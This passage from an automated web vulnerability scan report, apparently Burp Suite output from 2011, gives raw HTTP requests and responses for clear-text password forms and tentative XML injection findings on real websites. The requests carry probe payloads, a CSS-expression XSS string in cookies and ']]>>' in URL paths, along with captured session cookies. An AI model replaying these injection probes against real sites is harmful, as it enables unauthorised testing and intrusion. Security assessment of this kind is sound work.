Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131303
Date: Thu, 03 Feb 2011 16:50:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:44 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=New+York%2c+New+York&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 131303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>New York, NY Local Business S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.35. http://www.local.com/terms/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /terms/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /terms/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 65330
Date: Thu, 03 Feb 2011 16:51:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 65330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Terms of Service</t
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.36. http://www.local.com/topics/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /topics/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /topics/?topic=food&keyword=food HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 46766
Date: Thu, 03 Feb 2011 16:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:14 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=food; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 46766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.37. http://www.sipc.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:18:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...

7.38. http://www.sipc.org/index.cfm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /index.cfm HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:50:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...

7.39. http://www.supermedia.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:15:20 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



...[SNIP]...
</h3>
<form id="signinform" name="signin" onkeypress="headerSignIn(event, this, '/spportal/indexLogin.do')"
   action="/spportal/indexLogin.do" method="POST">

<table>
...[SNIP]...
<td>
<input type="password" name="password" class="textfield" id="password" AUTOCOMPLETE = "off"/>
<span class="subtext">
...[SNIP]...

8. XML injection
There are 22 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the role that the relevant input plays within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


8.1. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://a.dlqm.net
Path:   /adscgen/log_ut_err.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/log_ut_err.php HTTP/1.1
Host: a.dlqm.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:08:39 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=920
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1052


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

8.2. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://a.dlqm.net
Path:   /adscgen/log_ut_err.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/log_ut_err.php]]>> HTTP/1.1
Host: a.dlqm.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:08:41 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=416
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1052


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

8.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/st.php?survey_num=865756&site=57865895&code=39213494&randnum=1239703 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-4; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-i

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:07:30 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

8.4. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/st.php]]>>?survey_num=865756&site=57865895&code=39213494&randnum=1239703 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-4; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-i

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:07:33 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

8.5. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://dnn506yrbagrg.cloudfront.net
Path:   /pages/scripts/0011/2796.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pages]]>>/scripts/0011/2796.js HTTP/1.1
Host: dnn506yrbagrg.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9C15F15B82D40C76
x-amz-id-2: wNJIJ83ykwAkC58TMCPYdUkX8NaamV0sVVuW6EQbZIkIkks+CgGSRVkhiY9LkJih
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:04:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a3e6ae6f818a5a6cbe871e022815d1a29c6e64b3eb0371e5d99bb249539be54a6c242f3cf8648a3a
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 f564d0c1e4568b2b822f986a309f4114.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9C15F15B82D40C76</RequestId><HostId>wNJIJ83ykwAkC58TMCPYdUkX8NaamV0sVVuW6EQbZIkIkks+Cg
...[SNIP]...

8.6. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://dnn506yrbagrg.cloudfront.net
Path:   /pages/scripts/0011/2796.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pages/scripts]]>>/0011/2796.js HTTP/1.1
Host: dnn506yrbagrg.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 88BCC49D76FA1A6E
x-amz-id-2: fZdZIzgsDfXhAhMv+UJ2M9Yf0tfp2mvLvIPyVCM7q0NUe2EnPQgwxQahg9GAlyb7
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:04:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1933c67feaaccd5bf7907aef7a92cf254a33ce37678ed363fba79a37b3262b35898e4d054ba6dacb
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 f564d0c1e4568b2b822f986a309f4114.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>88BCC49D76FA1A6E</RequestId><HostId>fZdZIzgsDfXhAhMv+UJ2M9Yf0tfp2mvLvIPyVCM7q0NUe2EnPQ
...[SNIP]...

8.7. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://dnn506yrbagrg.cloudfront.net
Path:   /pages/scripts/0011/2796.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pages/scripts/0011]]>>/2796.js HTTP/1.1
Host: dnn506yrbagrg.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EE50C759A0C61CB7
x-amz-id-2: xKWPoWQP3zREdefgI9vSsQ+F4e8jzx2JXT8EMb9FdD7nxglkDwnlwVJQAJx+kM9x
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:04:51 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1c6fd79e002fd3a572763cf1256ecfd3830756422ea41418adae6d6c0473336e2067898d88b3f39d
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 f564d0c1e4568b2b822f986a309f4114.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EE50C759A0C61CB7</RequestId><HostId>xKWPoWQP3zREdefgI9vSsQ+F4e8jzx2JXT8EMb9FdD7nxglkDw
...[SNIP]...

8.8. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://dnn506yrbagrg.cloudfront.net
Path:   /pages/scripts/0011/2796.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pages/scripts/0011/2796.js]]>> HTTP/1.1
Host: dnn506yrbagrg.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1A25451BD32755E1
x-amz-id-2: uNfwwSw+L/RlkBX+TKy5FE38Zb4LanV/2v3qmsgLzAXWxAaxB4Y2K4ry+I8iXXVR
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:04:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ce857294f2db24fb5e2f8f563f97e3d3eba0b6be2f091c88544f1f413c38208980c5b08808c462a4
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 f564d0c1e4568b2b822f986a309f4114.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1A25451BD32755E1</RequestId><HostId>uNfwwSw+L/RlkBX+TKy5FE38Zb4LanV/2v3qmsgLzAXWxAaxB4
...[SNIP]...

8.9. http://loadus.exelator.com/load/ [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/?p=235&g=001&ctg=Retail+Banks&cat=financial_services&state=TX&city=Dallas&kw=banks HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
